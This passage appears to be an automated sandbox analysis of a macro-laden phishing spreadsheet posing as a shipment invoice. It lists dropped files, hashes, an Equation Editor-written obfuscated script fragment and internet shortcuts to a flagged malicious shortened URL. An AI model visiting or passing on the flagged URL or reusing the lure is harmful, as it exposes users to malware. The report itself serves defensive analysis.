                                                              MD5:8A188A6917AD1FA0C7F1AA20A63C8593
                                                              SHA1:4D2270D647D4A3680B47E85501C7AB1442DDCBB2
                                                              SHA-256:728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
                                                              SHA-512:823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
                                                              Malicious:false
                                                              Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.70352454888392
                                                              Encrypted:false
                                                              SSDEEP:192:kPPEG6vc8UuMj8eO7g2PzG6ic8UuMj8eO7g:2Px8UrO7g2Pj8UrO7g
                                                              MD5:05054D90B225AEA147C40AA3C057026E
                                                              SHA1:A178DD3F06F3FD0F0C2AB693B931E37BC6CE3FA9
                                                              SHA-256:F46388C3A7F91E249101014E6D161B9AE9E3158877853C9B1540945C32390939
                                                              SHA-512:2A296AD3BF446AA84ECF1753185123C735C82CC82C17172C9B0A850CD6D69641FAC7E23C8B922C91DAE40367C8D156749248580B79B573288793B9CC34A4DC7A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):17440
                                                              Entropy (8bit):3.6288185643961524
                                                              Encrypted:false
                                                              SSDEEP:384:AW+REzTznNVPMaaqWuqH/vh5zuUbgTVv7tqbxf4xSHUtmvowVg97PaY:X+cHNVEa4H/J5aUmv70f4EHkeY
                                                              MD5:2299A9CD6198541B96BCCFB177D24C61
                                                              SHA1:423EDAB034E941CCB7E9A18F11E118177CA9560C
                                                              SHA-256:66B952B793376670F6398009DD2B8F73A86D344C9D60D33098A283CDC89147B7
                                                              SHA-512:D45E6E6524B1CE0B27C6B30D225A1476CBD07C15EF04B50314970E07E760BFFB7E5968533160889522BE96DBD1AF29E6B8B196739A8E619C1D3BBC9FE2EDD3CC
                                                              Malicious:false
                                                              Preview:....................1.1.3.7.6.0.5.4.:.'.=.@.<.(.[.~.?.^.~._.1.../.`.!.).#...(.:.%./.~.).[.!...|.+.<.~.8.~.!.%.'.3.|.?.#.&.>._.=.`.#.0.1._.?.-.@.~.>.>.=.%.,.@.[./.,.3.;.8.@.+.9.+.%.>...=.9.2.`.4.[./.2.&.?.:.5.)./.?.&.?.#.%.?.~._...:.2.$.;.3.5.;.8.4.>.,.)...../.3.[.|.3.8...=.$.2.>.].1...|.?.<.=...!.=././.(.].'.+.*.|.=._.6.!...+.8.5.?.[./.^.%.+.].'.|...[.?.....*.8.@./.?.=.].~.,.7.6...?.4.!./.7...].[.?...0.^._.#.6.,._.2.?...4.*.~.*.5./.*.1...8.0.(.6.5.=.<...$.8.^.`._.>./.%.).<.?.3.?.~.?.%.?.|.].).].?.,...+.4.!.?.(...1.9.1.).).?.?.&.%._.[.?.,...<.^.).|.#...2.%.&.?.?.#.>.!.:.?.).?.1.4.!.'.=.=.$.9.6.`.1.~.;.?...>.&.%.@.%.=.&.?.?.?.8.?.%.4.%.].#.^.-.=.<.~.5.|.^.%.3.?.0.%...^.5.%.....%...1.6.<.,.(.`.^.7.|.^.<.$.4.`.1...2.>.?.%.).&...?...%.|.%.[.?.^.-.>.7.7.7.!.?.:.%.#./.*.).1.4.!.|.!.:.<.8.....6.3./.%.@.$.>.:.1.'.3.5.%./.`.,.?.!.~.2.>.*.6.@./.1.2.~.?.>.9.8.;.9...5.)...%.@.=.~.?.%._.?.!.;.;.?.?.`.&.?.@.?./.!.....5.0...>.*.8.&.6.%.|.?.@.2.0.7.^.1.(.;.*.9.|.=.@.'.?.,.5.|.7.!.5.%.^.+.?.(.?.(.6.?.%.
                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1024
                                                              Entropy (8bit):0.05390218305374581
                                                              Encrypted:false
                                                              SSDEEP:3:ol3lYdn:4Wn
                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x208b021f, page size 32768, DirtyShutdown, Windows version 6.1
                                                              Category:dropped
                                                              Size (bytes):21037056
                                                              Entropy (8bit):1.1390571939639842
                                                              Encrypted:false
                                                              SSDEEP:24576:7O1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:7OEXs1LuHqqEXwPW+RHA6m1fN
                                                              MD5:474FE7F8448FC967BB44114FE02F892B
                                                              SHA1:A1EC93AE5611CCE0D91E8BF7A64610644F0C31B8
                                                              SHA-256:8DBE14E01149034977F5AE742E98C25E834BD88C68F6A4E4B260CC22288F7DC5
                                                              SHA-512:447A0848CB1A104454DABF3AF706870112B42E8E30EF56381A39DEDA18545E33F3AA65E7F52B95CEFE9744696592A2532FD574839F23974DBF797D714B554326
                                                              Malicious:false
                                                              Preview: ...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):2
                                                              Entropy (8bit):1.0
                                                              Encrypted:false
                                                              SSDEEP:3:Qn:Qn
                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                              Malicious:false
                                                              Preview:..
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview:1
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):500
                                                              Entropy (8bit):7.621270342807958
                                                              Encrypted:false
                                                              SSDEEP:12:sxi81L3/JXXf2JJKWrf6imhnVayIysj5lFqSaB10flV0eBVHxP3wU:Ai8/Xv2JJtckyIZ7Fqj+zVHxPh
                                                              MD5:71092A5CB1F7FD10974A07DCFA8A851C
                                                              SHA1:A4C9746C507CDCD19C375F76D8CED0D62B415412
                                                              SHA-256:B6037973CF20300BDBD8CC27A38EBFCE3F07CBEB7316A9881EFEDD89A5B76EA7
                                                              SHA-512:A679CE71340609D8607E6EB1CABA680D683FD3480079A2D9E64518A3C837195D808D040D394308CA8E07DF5540AA13C5672328CF7F25F106571BE1AF3D2B9B1F
                                                              Malicious:false
                                                              Preview:.=.........7.@..NL.X.y.v..$..C..7....I^n..E....4[.......r.I.Y..5f.'...>.LC.Z..?r.`kH...E;1M..yc8..d./t.+~......4....Ra.../.x....>...>...d/.R....;'.ps.D@dA..$Q.....!.1Uc.u.pF.|;X.?...\.0..r...:.`..D..}.>.0...~.....6.......0....`b.wY.Dk....Sw..m^c.Qt.......,.U....j.[...~..-.v..`@ .....4...(f..u..?.......H.2.-.0. ...%.Q...;!...l.S..bG%Cv....P..<.$o...N.[.......j.U.... ..$v.r........l......DZc.F...........&.H$...G.O..7z.#......'...=.#n.E..W.[.....w6n..@...dX.HpU.0']4.I]..~l.
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview:1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview:1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview:1
                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):131072
                                                              Entropy (8bit):0.025626515715904664
                                                              Encrypted:false
                                                              SSDEEP:6:I3DPc2WLO9vxggLRX9j8K4SvtRXv//4tfnRujlw//+GtluJ/eRuj:I3DP2k5v4aTvYg3J/
                                                              MD5:FF2A9FB346B47FB6345037E967EA5661
                                                              SHA1:BE3E379323E736AF9F21C2C345620F7D50740255
                                                              SHA-256:422B0BAD9E0FAAAF244EBCB3A584F414FEEE4F0DE402B51ACCFD7CF56179A136
                                                              SHA-512:CCEDA6250490B0B3176A79224F91A3748C8F6D5FA3041F0C4C45BECB21DC74D8AEA8BDD88D68DCFCDDCAD0C52501A1C57B2D1D49A44EE957CA63612C1D26477F
                                                              Malicious:false
                                                              Preview:......M.eFy...z..B...?C....h+..S,...X.F...Fa.q...............................M..O..K.o',C........ ...k.SN.B..C......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):131072
                                                              Entropy (8bit):0.025630452914884125
                                                              Encrypted:false
                                                              SSDEEP:6:I3DPcBaixFvxggLRVLHWKV3djRXv//4tfnRujlw//+GtluJ/eRuj:I3DPQagAKhvYg3J/
                                                              MD5:C252354C637F952E4B56C30BE80234D0
                                                              SHA1:590EBCCF0B7CB6966A3F86F489DCD87CF8B1E42B
                                                              SHA-256:D9DB16DD6338380FD13A190E63176D4E2CEBF5A12783050E1260525D8BDD6BB2
                                                              SHA-512:FB2E102B778F3E77648865032B63CB962F24B5DC69BDD7B16F425FC5DC1825E63EE1A8475008D8FF12F0E79B6BEC9AEF894AA6419A820D414D01907375EE2B9C
                                                              Malicious:false
                                                              Preview:......M.eFy...z.r.mb .N.H#..'!aS,...X.F...Fa.q..............................l.n.5A...;.K.4........a.x~f.I..l.lUv.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.690866585846527
                                                              Encrypted:false
                                                              SSDEEP:24:7EeQP64OtFGU9YPOknEzkofurju0F/GuguGFhhzoP7o9RIS:7E/2GsYPGGu0FxguGFzg7I
                                                              MD5:AD01B34D5A1F1C0026E5E5DAF7542A0F
                                                              SHA1:16CA5CEFCE597F84DD05945526A495204D831E5F
                                                              SHA-256:A68C322B5EB94F71E3434AD072FEF90E0E72EE206221B6082FA683841A0DD8BC
                                                              SHA-512:05A0E45D16351BB193C6157F0CFE060F70F171C340B261F4D4D397A6D7F0104AA88EEAD3A3CD0CCD99BBCC51B3F9EE0DCCFA3917DE29B130A5939465874E6DCF
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://a38.fr/GQ1oBm>), ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):47
                                                              Entropy (8bit):4.766938851493512
                                                              Encrypted:false
                                                              SSDEEP:3:HRAbABGQYm2fnai0Zv:HRYFVm4Q
                                                              MD5:2A5D102B7311A0AD99BE60C00D07B21A
                                                              SHA1:66448DB8324BB5998ADF745D21A3814C17D745B0
                                                              SHA-256:F6B3567CBB53E5EB5DA37494E43B435C070C1BB8C2504F19F90DA8EB27480F88
                                                              SHA-512:F2ED349BF00E6F97DCE0C8BAA4CB0FB958722AE9C488C46E777A765E2487345F17024941BA04CF3787F7F6A46185530830EEE8EEB7135E8117ABC61D2975A788
                                                              Malicious:true
                                                              Preview:[InternetShortcut]..URL=https://a38.fr/GQ1oBm..
                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://a38.fr/>), ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):41
                                                              Entropy (8bit):4.503416638553356
                                                              Encrypted:false
                                                              SSDEEP:3:HRAbABGQYm2fnayn:HRYFVm4Tn
                                                              MD5:3AE5236875B9DC486FF4941573CF803F
                                                              SHA1:8C756F7C52B54670B783ED69D6AFCCE0E8044770
                                                              SHA-256:604E754243B29437D126A5215B879675C1867648BF590B2E29F9336F512C2EF9
                                                              SHA-512:ABC5607EA71AFDC4CFC406E9F71B56174441951E91159875D38AB3F3DDEB15BDDA7F7DBDC06922634D1A42CFB8D7BA47FCF4A8C84391D8A583F654D5D2AFBF81
                                                              Malicious:true
                                                              Preview:[InternetShortcut]..URL=https://a38.fr/..
                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              File Type:Generic INItialization configuration [xls]
                                                              Category:modified
                                                              Size (bytes):120
                                                              Entropy (8bit):5.047102862882893
                                                              Encrypted:false
                                                              SSDEEP:3:bD88SWXLQXJr1ML9FU/mMPML9FU/v:bw/WXLQX7KUzPKUn
                                                              MD5:CB89AC0654F8A5D59C05609BE8E38782
                                                              SHA1:BF666030FE67D0365EA7F02C9BC0A3D73169A643
                                                              SHA-256:AD2A09B18693CC814FFDE96AFBC0CF8400E256C5581E86F5F93E218954FDD4B4
                                                              SHA-512:68387DC56D93299CC705F05F8CBE2FA9C5AFFD10163AC54D0E51EA70DD8FD8D8977A30B3B6A15089E099C7FED4206EF8ED05003FF98776C60FE8627371400222
                                                              Malicious:false
                                                              Preview:[folders]..GQ1oBm.url=0..a38.fr.url=0..August Shipment - Inv No. 041.LNK=0..[xls]..August Shipment - Inv No. 041.LNK=0..
                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):162
                                                              Entropy (8bit):2.4797606462020303
                                                              Encrypted:false
                                                              SSDEEP:3:vrJlaCkWtVyRyaSiuW3hWRUbilfln:vdsCkWta5RJhhbidl
                                                              MD5:CA9570952A5F48F847628233AB5AB2D4
                                                              SHA1:109750BB54BEFE801619BFE33AFE1BA2DCC152AB
                                                              SHA-256:35BC7B00A750EC0D7066E16C7A8021E46EB3E4937D83FC67F47AF3AEC99135EC
                                                              SHA-512:0749A18934BD44BB05B250FF0FBC8F4630B0767F650CEDFCDF8C44E6E1EE8E3F250AB254F3F622F88A61EBA6FAA7F2138F6507441ACC4057652B93C2B0C50EE9
                                                              Malicious:false
                                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):182202
                                                              Entropy (8bit):3.841931638249334
                                                              Encrypted:false
                                                              SSDEEP:3072:OEfMV0+KP6TfljceGw28+3bQgt5pMGwpQy7IqK7hNU7oRhvIb7:RfMV0NP6TxUh3XNg4k7
                                                              MD5:25FA290C83C38B83D3E49E043C89BEB5
                                                              SHA1:715087372C4CD1816B29C89DD98B336EEAA0EE54
                                                              SHA-256:62980E48F844DADEF0FF04A151C9EBD5F5EE24E1606B7BB94230491907E8BE27
                                                              SHA-512:A92C00F0511C3EDC1E7C042734B703466279ACFF997936567BF247B1EB36A8265815F9352C72085B001EF1094C1E8A60CD414EE1DDC05A4A7B6F719757C5EC0C
                                                              Malicious:true
                                                              Preview:......m.n.W.L.t.g.i.b.L.k. .=. .".Z.Q.t.L.e.d.T.U.B.u.".....K.b.P.Z.Z.f.k.e.e.N. .=. .".u.z.K.L.o.G.v.t.j.N.".....e.x.A.W.i.m.W.C.p.c. .=. .".Q.i.b.s.B.s.O.c.i.B.".....G.A.L.d.h.c.S.c.K.L. .=. .".t.c.f.G.n.U.A.f.Z.L.".....A.f.i.l.f.s.i.b.H.W. .=. .".i.z.h.r.k.o.b.I.B.k.".....O.i.e.Z.d.L.a.x.k.c. .=. .".K.c.G.J.g.L.G.p.p.s.".....J.G.h.R.K.d.e.O.W.i. .=. .".W.j.L.U.H.b.k.G.k.b.".........i.L.k.A.o.L.z.L.U.c. .=. .".N.t.W.Z.U.C.z.W.W.k.".....i.W.k.O.c.c.q.L.A.d. .=. .".L.T.G.G.K.R.G.p.h.O.".....z.K.B.W.p.J.f.c.g.Z. .=. .".L.G.q.K.f.W.H.l.c.i.".....b.i.l.d.L.W.P.W.P.A. .=. .".W.H.L.P.P.W.W.m.p.b.".....A.n.r.W.b.L.R.p.b.i. .=. .".U.n.f.L.f.N.p.K.q.n.".....u.T.L.a.i.p.J.b.c.l. .=. .".n.z.c.W.L.K.e.l.G.N.".....i.q.L.R.P.x.L.K.h.i. .=. .".W.C.K.m.K.o.L.h.G.b.".....W.o.k.A.T.N.e.o.P.u. .=. .".k.f.q.p.j.T.r.r.U.o.".....l.r.n.x.v.x.t.d.d.L. .=. .".O.b.h.B.B.e.W.z.B.h.".....L.U.L.K.x.L.a.f.o.L. .=. .".p.L.G.L.g.K.R.z.W.i.".........G.K.J.A.f.U.Z.u.l.W. .=. .".W.a.O.a.u.d.L.f.f.s.".....Z.W.d.B.W.U.W.
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 13:01:03 2024, Security: 1
                                                              Category:dropped
                                                              Size (bytes):574464
                                                              Entropy (8bit):7.981980022775657
                                                              Encrypted:false
                                                              SSDEEP:12288:f+7roYBzicOMhsRsz/sVMtNLGZgPDRE01nKqa6rDDnXfMsQeBa5:fcrtyMhsRsGMuZg8qjrfPlQeBa
                                                              MD5:B24A0A1DD92B6A7971B59EE53D5B7691
                                                              SHA1:C23E6861651D68E1536ACE507144A3A7F3F6C02E
                                                              SHA-256:2D64C3F2A3ECE0327CE8C85C6C95BD60D974B96381B07A93483B21677AC4E486
                                                              SHA-512:4D62D4ACE5F8DF925EB1AD58FA57054FB21E9AA800A2CC55333DEF90EFBD14B6BEFD4578507B45502469788A5DEC295C4DD3FF02C7E6AFB4016BA39A26715C4C
                                                              Malicious:true
                                                              Preview:......................>...................................)...................k.......m.......o.......q...............................................................................................................................................................................................................................................................................................................................................................................................................................`................................................................................................................... ...!..."...#...$...%...&...'...(..........._...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...l.......m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 13:01:03 2024, Security: 1
                                                              Category:dropped
                                                              Size (bytes):574464
                                                              Entropy (8bit):7.981980022775657
                                                              Encrypted:false
                                                              SSDEEP:12288:f+7roYBzicOMhsRsz/sVMtNLGZgPDRE01nKqa6rDDnXfMsQeBa5:fcrtyMhsRsGMuZg8qjrfPlQeBa
                                                              MD5:B24A0A1DD92B6A7971B59EE53D5B7691
                                                              SHA1:C23E6861651D68E1536ACE507144A3A7F3F6C02E
                                                              SHA-256:2D64C3F2A3ECE0327CE8C85C6C95BD60D974B96381B07A93483B21677AC4E486
                                                              SHA-512:4D62D4ACE5F8DF925EB1AD58FA57054FB21E9AA800A2CC55333DEF90EFBD14B6BEFD4578507B45502469788A5DEC295C4DD3FF02C7E6AFB4016BA39A26715C4C
                                                              Malicious:false
                                                              Preview:......................>...................................)...................k.......m.......o.......q...............................................................................................................................................................................................................................................................................................................................................................................................................................`................................................................................................................... ...!..."...#...$...%...&...'...(..........._...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...l.......m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:false
                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 08:00:15 2024, Security: 1
                                                              Entropy (8bit):7.961445403085052
                                                              TrID:
                                                              • Microsoft Excel sheet (30009/1) 47.99%
                                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                              File name:August Shipment - Inv No. 041.xls
                                                              File size:568'342 bytes
                                                              MD5:f86a185db8b9a383245e2639a234e7aa
                                                              SHA1:12cd9aed8efe4708fcb05df2537cae919c0a7342
                                                              SHA256:227c0d045a590bfd1e70044c6d01a62cae7c9b0a90b1c4165be4c987aa635a74
                                                              SHA512:4f71ffc547c7f7f25e436d45938f816bc4a3e5d9d08d6b7ba4928682792fddd5045eb99b3d3ac7ca5c23b9226c05d69ed3070ed411cef126dbe0c6c82378b902
                                                              SSDEEP:12288:U+vQGJ95vnS07h1m0P2ringUiv6BVZhi+m+p5RdzVPVIWFCoD3xRBIW7Y:UMB3h40PhgUNZhiT+DRpVPbFbDBRy
                                                              TLSH:91C4235473E8CF07F487AD7098CCA2CF266DFC056FA6C7677154B389E434E825A82629
                                                              File Content Preview:........................>...................................)...................k.......m.......o.......q......................................................................................................................................................
                                                              Icon Hash:276ea3a6a6b7bfbf
                                                              Document Type:OLE
                                                              Number of OLE Files:1
                                                              Has Summary Info:
                                                              Application Name:Microsoft Excel
                                                              Encrypted Document:True
                                                              Contains Word Document Stream:False
                                                              Contains Workbook/Book Stream:True
                                                              Contains PowerPoint Document Stream:False
                                                              Contains Visio Document Stream:False
                                                              Contains ObjectPool Stream:False
                                                              Flash Objects Count:0
                                                              Contains VBA Macros:True
                                                              Code Page:1252
                                                              Author:
                                                              Last Saved By:
                                                              Create Time:2006-09-16 00:00:00
                                                              Last Saved Time:2024-08-28 07:00:15
                                                              Creating Application:Microsoft Excel
                                                              Security:1
                                                              Document Code Page:1252
                                                              Thumbnail Scaling Desired:False
                                                              Contains Dirty Links:False
                                                              Shared Document:False
                                                              Changed Hyperlinks:False
                                                              Application Version:786432
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                              VBA File Name:Sheet1.cls
                                                              Stream Size:977
